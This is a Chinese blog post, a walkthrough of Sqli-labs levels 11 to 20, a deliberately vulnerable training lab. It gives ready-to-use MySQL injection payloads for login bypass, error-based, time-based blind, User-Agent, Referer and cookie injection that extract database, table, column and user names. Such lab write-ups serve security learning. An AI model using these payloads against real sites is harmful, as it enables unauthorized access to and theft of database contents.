<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/fish.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/fish.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/fish.png?v=5.1.4">


  <link rel="mask-icon" href="/images/fish.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="鸡翅儿">










<meta name="description" content="和前十关不一样的是，接下来几题是POST注入题型，根据POST表单提交的数据来进行注入，其实也就是输入点的不同 Less-11首先看到两个输入框，输入错误的账户密码不显示，输入一下特殊字符看看会不会报错 两个输入框均输入万能密码&amp;#39;or &amp;#39;1&amp;#39;=&amp;#39;1，显示出第一个用户，证明账号密码处全部被置为空，默认输出一个账户，证明应该是单引号对其闭合了，猜测sql语句格式应该是u">
<meta property="og:type" content="article">
<meta property="og:title" content="Sqli-labs闯关详解（11-20）">
<meta property="og:url" content="http://wcute.github.io/2019/05/14/Sqli-labs闯关详解（11-20）/index.html">
<meta property="og:site_name" content="鸡翅儿">
<meta property="og:description" content="和前十关不一样的是，接下来几题是POST注入题型，根据POST表单提交的数据来进行注入，其实也就是输入点的不同 Less-11首先看到两个输入框，输入错误的账户密码不显示，输入一下特殊字符看看会不会报错 两个输入框均输入万能密码&amp;#39;or &amp;#39;1&amp;#39;=&amp;#39;1，显示出第一个用户，证明账号密码处全部被置为空，默认输出一个账户，证明应该是单引号对其闭合了，猜测sql语句格式应该是u">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-42d99d4c20c623ab.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-4d6c46b3c282502c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-e90d87862476b8f1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-ab84799e24fbcf38.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-80383914d3ecbb1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-dac8037d5e8d021d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-616546f4ad8a4e5c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-ebab3935e5868957.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-e561405409c0e517.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-d44253a26784d231.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-6a3d3b4abc1979fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-08947c76f0c41564.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-6c293d34c91b04f6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-4fcd1c13bd31251d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-2f8e45179ef64c39.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/12585049-0ddee0d90c78c940.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-05-16T00:37:58.202Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Sqli-labs闯关详解（11-20）">
<meta name="twitter:description" content="和前十关不一样的是，接下来几题是POST注入题型，根据POST表单提交的数据来进行注入，其实也就是输入点的不同 Less-11首先看到两个输入框，输入错误的账户密码不显示，输入一下特殊字符看看会不会报错 两个输入框均输入万能密码&amp;#39;or &amp;#39;1&amp;#39;=&amp;#39;1，显示出第一个用户，证明账号密码处全部被置为空，默认输出一个账户，证明应该是单引号对其闭合了，猜测sql语句格式应该是u">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/12585049-42d99d4c20c623ab.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://wcute.github.io/2019/05/14/Sqli-labs闯关详解（11-20）/">





  <title>Sqli-labs闯关详解（11-20） | 鸡翅儿</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">鸡翅儿</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://wcute.github.io/2019/05/14/Sqli-labs闯关详解（11-20）/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="wcute">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="鸡翅儿">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Sqli-labs闯关详解（11-20）</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-05-14T19:23:00+08:00">
                2019-05-14
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/靶场练习/" itemprop="url" rel="index">
                    <span itemprop="name">靶场练习</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>和前十关不一样的是，接下来几题是POST注入题型，根据POST表单提交的数据来进行注入，其实也就是输入点的不同</p>
<h4 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h4><p>首先看到两个输入框，输入错误的账户密码不显示，输入一下特殊字符看看会不会报错<br><img src="https://upload-images.jianshu.io/upload_images/12585049-42d99d4c20c623ab.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<p>两个输入框均输入万能密码<code>&#39;or &#39;1&#39;=&#39;1</code>，显示出第一个用户，证明账号密码处全部被置为空，默认输出一个账户，证明应该是单引号对其闭合了，猜测sql语句格式应该是<code>username=&#39;username&#39; and password=&#39;password&#39;</code><br>使用其中一个字段测试，这里使用username字段测试，输入<code>&#39;or 1=1 order by 3 #</code>显示字段不存在<br><img src="https://upload-images.jianshu.io/upload_images/12585049-4d6c46b3c282502c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>测试<code>&#39;or 1=1 order by 2 #</code>输出一个账户密码，由此判断有两个字段<br><img src="https://upload-images.jianshu.io/upload_images/12585049-e90d87862476b8f1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>由于web界面比较不友好，可以使用burpsuite抓包进行注入<br><img src="https://upload-images.jianshu.io/upload_images/12585049-ab84799e24fbcf38.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<h5 id="payload"><a href="#payload" class="headerlink" title="payload"></a>payload</h5><p>payload其实和之前的是一样的，只不过是post型和get型输入点不同，还是放上来吧<br>这里使用报错注入<br>注当前数据库名<br><code>&#39; or 1=1 union select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注第一个表名<br><code>&#39; or 1=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=&quot;security&quot; limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注user表里的第二个字段<br><code>&#39; or 1=1 union select count(*),concat((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注字段的值，这里注 users 表里的 usrname 字段为例<br><code>&#39; or 1=1 union select count(*),concat((select username from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<h4 id="Less-12"><a href="#Less-12" class="headerlink" title="Less-12"></a>Less-12</h4><p>与上一题几乎一样，只不过闭合方式改为<code>&quot;)</code>，所以直接放payload</p>
<h5 id="payload-1"><a href="#payload-1" class="headerlink" title="payload"></a>payload</h5><p>注当前数据库名<br><code>&quot;) or 1=1 union select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注第一个表名<br><code>&quot;) or 1=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=&quot;security&quot; limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注user表里的第二个字段<br><code>&quot;) or 1=1 union select count(*),concat((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注字段的值，这里注 users 表里的 usrname 字段为例<br><code>&quot;) or 1=1 union select count(*),concat((select username from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<h4 id="Less-13"><a href="#Less-13" class="headerlink" title="Less-13"></a>Less-13</h4><p>与十一题也几乎一样，只不过闭合方式改为<code>&#39;)</code>，所以直接放payload</p>
<h5 id="payload-2"><a href="#payload-2" class="headerlink" title="payload"></a>payload</h5><p>注当前数据库名<br><code>&#39;) or 1=1 union select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注第一个表名<br><code>&#39;) or 1=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=&quot;security&quot; limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注user表里的第二个字段<br><code>&#39;) or 1=1 union select count(*),concat((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注字段的值，这里注 users 表里的 usrname 字段为例<br><code>&#39;) or 1=1 union select count(*),concat((select username from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<h4 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h4><p>和十一题相似，与十一题也几乎一样，只不过闭合方式改为<code>&quot;</code>，所以直接放payload</p>
<h5 id="payload-3"><a href="#payload-3" class="headerlink" title="payload"></a>payload</h5><p>注当前数据库名<br><code>&quot; or 1=1 union select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注第一个表名<br><code>&quot; or 1=1 union select count(*),concat((select table_name from information_schema.tables where table_schema=&quot;security&quot; limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注user表里的第二个字段<br><code>&quot; or 1=1 union select count(*),concat((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<p>注字段的值，这里注 users 表里的 usrname 字段为例<br><code>&quot; or 1=1 union select count(*),concat((select username from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x; #</code></p>
<h4 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h4><p>15题主要考查的基于时间的延迟注入<br>直接放payload了 </p>
<h5 id="payload-4"><a href="#payload-4" class="headerlink" title="payload"></a>payload</h5><p>爆数据库第一个字母<br><code>&#39; or 1=1 and If(ascii(substr(database(),1,1))=115,1,sleep(5)) #</code><br>爆第一个数据库(security)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第二个字段(id)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select column_name from information_schema.columns where table_name=&#39;emails&#39; limit 0,1),1,1))=105,sleep(5),1) #</code></p>
<h4 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h4><p>与15题类似，闭合条件改为<code>&quot;)</code><br>直接放payload</p>
<h5 id="payload-5"><a href="#payload-5" class="headerlink" title="payload"></a>payload</h5><p>爆数据库第一个字母<br><code>&quot;) or 1=1 and If(ascii(substr(database(),1,1))=115,1,sleep(5)) #</code><br>爆第一个数据库(security)的第一个字母<br><code>&quot;) or 1=1 and If(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第一个字母<br><code>&quot;) or 1=1 and If(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第二个字段(id)的第一个字母<br><code>&quot;) or 1=1 and If(ascii(substr((select column_name from information_schema.columns where table_name=&#39;emails&#39; limit 0,1),1,1))=105,sleep(5),1) #</code></p>
<h4 id="Less-17"><a href="#Less-17" class="headerlink" title="Less-17"></a>Less-17</h4><p>17题打开提示密码重置，输已存在用户名密码，提示更新成功，可以先遍历一下已存在用户名，存在即更新成功。这里测出存在 admin 用户<br><img src="https://upload-images.jianshu.io/upload_images/12585049-80383914d3ecbb1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>执行的应该是update语句<br>可以尝试对new password字段进行闭合，由于不知道是否能注成功，可以使用延迟注入，根据返回时间来判断是否成功注入<br>添加单引号，报错，根据报错信息判断应该使用单引号进行闭合<br><img src="https://upload-images.jianshu.io/upload_images/12585049-dac8037d5e8d021d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>尝试延迟，不知道什么原因，我这个延迟的时间有点长，但是不使用sleep函数返回还是很快的，由此可以判断注入成功<br><img src="https://upload-images.jianshu.io/upload_images/12585049-616546f4ad8a4e5c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>接下来和之前一样放payload了</p>
<h5 id="payload-6"><a href="#payload-6" class="headerlink" title="payload"></a>payload</h5><p>爆数据库第一个字母<br><code>&#39; or 1=1 and If(ascii(substr(database(),1,1))=115,1,sleep(5)) #</code><br>爆第一个数据库(security)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第二个字段(id)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select column_name from information_schema.columns where table_name=&#39;emails&#39; limit 0,1),1,1))=105,sleep(5),1) #</code></p>
<h4 id="Less-18"><a href="#Less-18" class="headerlink" title="Less-18"></a>Less-18</h4><p>首先看到一个 ip ，但是测试输入单引号等特殊字符返回页面均不改变，测试一下正常输入，利用17题更新的密码，登陆过后看到<code>your user agent:...</code>等字样，猜测有可能是头部注入<br><img src="https://upload-images.jianshu.io/upload_images/12585049-ebab3935e5868957.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>依旧开启burpsuite进行抓包，将<code>user-agent</code>字段改为<code>123&#39;</code>，页面直接输出，此处应该就是注入点了<br><img src="https://upload-images.jianshu.io/upload_images/12585049-e561405409c0e517.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>自己尝试了报错注入和时间盲注，但是都没有注出来，查了网上payload 还是换一种报错注入方式吧，这里使用updatexml进行注入<br>直接放payload吧还是</p>
<h5 id="payload-7"><a href="#payload-7" class="headerlink" title="payload"></a>payload</h5><p>注数据库<br><code>&#39; and updatexml(1,concat(0x3a,database()),1))#</code><br><img src="https://upload-images.jianshu.io/upload_images/12585049-d44253a26784d231.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<h4 id="Less-19"><a href="#Less-19" class="headerlink" title="Less-19"></a>Less-19</h4><p>和18题类似，只不过注点换了，输入正确账户密码提示<code>your referer is ...:</code><br><img src="https://upload-images.jianshu.io/upload_images/12585049-6a3d3b4abc1979fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>直接放payload</p>
<h5 id="payload-8"><a href="#payload-8" class="headerlink" title="payload"></a>payload</h5><p>注数据库<br><code>&#39; and updatexml(1,concat(0x3a,database()),1))#</code><br><img src="https://upload-images.jianshu.io/upload_images/12585049-08947c76f0c41564.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<h4 id="Less-20"><a href="#Less-20" class="headerlink" title="Less-20"></a>Less-20</h4><p>输入正确账号密码后出现如图情况<br><img src="https://upload-images.jianshu.io/upload_images/12585049-6c293d34c91b04f6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>根据提示这题考查cookie注入，开启抓包，删除cookie从登陆开始抓包。<br>输入账号密码，提交数据后抓包，查看cookie参数并没有什么特殊，对任意字段添加特殊字符也均无反应，后来突然发现把第一个post提交数据包forward过后还有一个包，并且发现cookie有一个特殊字段，<code>uname</code>，猜测注点应该就是在这了<br><img src="https://upload-images.jianshu.io/upload_images/12585049-4fcd1c13bd31251d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>尝试特殊字符 闭合<code>uname</code>字段<br>加单引号报错，尝试payload<code>&#39; and sleep(3) #</code>成功延时，所以此题是使用单引号闭合<br><img src="https://upload-images.jianshu.io/upload_images/12585049-2f8e45179ef64c39.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>尝试探测字段，4显示不存在，3显示正常，所以三个字段<br><img src="https://upload-images.jianshu.io/upload_images/12585049-0ddee0d90c78c940.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"></p>
<h5 id="payload-9"><a href="#payload-9" class="headerlink" title="payload"></a>payload</h5><p>爆数据库(security)第一个字母<br><code>&#39; or 1=1 and If(ascii(substr(database(),1,1))=115,1,sleep(5)) #</code><br>爆第一个数据库(security)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1) #</code><br>爆当前数据库(security)的第一个表(emails)的第二个字段(id)的第一个字母<br><code>&#39; or 1=1 and If(ascii(substr((select column_name from information_schema.columns where table_name=&#39;emails&#39; limit 0,1),1,1))=105,sleep(5),1) #</code></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/05/14/Sqli-labs闯关详解（1-10）/" rel="next" title="Sqli-labs闯关详解（1-10）">
                <i class="fa fa-chevron-left"></i> Sqli-labs闯关详解（1-10）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/05/23/Mysql 注入之 limit 注入/" rel="prev" title="Mysql 注入之 limit 注入">
                Mysql 注入之 limit 注入 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">wcute</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">58</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-11"><span class="nav-number">1.</span> <span class="nav-text">Less-11</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload"><span class="nav-number">1.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-12"><span class="nav-number">2.</span> <span class="nav-text">Less-12</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-1"><span class="nav-number">2.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-13"><span class="nav-number">3.</span> <span class="nav-text">Less-13</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-2"><span class="nav-number">3.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-14"><span class="nav-number">4.</span> <span class="nav-text">Less-14</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-3"><span class="nav-number">4.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-15"><span class="nav-number">5.</span> <span class="nav-text">Less-15</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-4"><span class="nav-number">5.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-16"><span class="nav-number">6.</span> <span class="nav-text">Less-16</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-5"><span class="nav-number">6.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-17"><span class="nav-number">7.</span> <span class="nav-text">Less-17</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-6"><span class="nav-number">7.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-18"><span class="nav-number">8.</span> <span class="nav-text">Less-18</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-7"><span class="nav-number">8.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-19"><span class="nav-number">9.</span> <span class="nav-text">Less-19</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-8"><span class="nav-number">9.1.</span> <span class="nav-text">payload</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Less-20"><span class="nav-number">10.</span> <span class="nav-text">Less-20</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#payload-9"><span class="nav-number">10.1.</span> <span class="nav-text">payload</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart" aria-hidden="true"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wcute</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
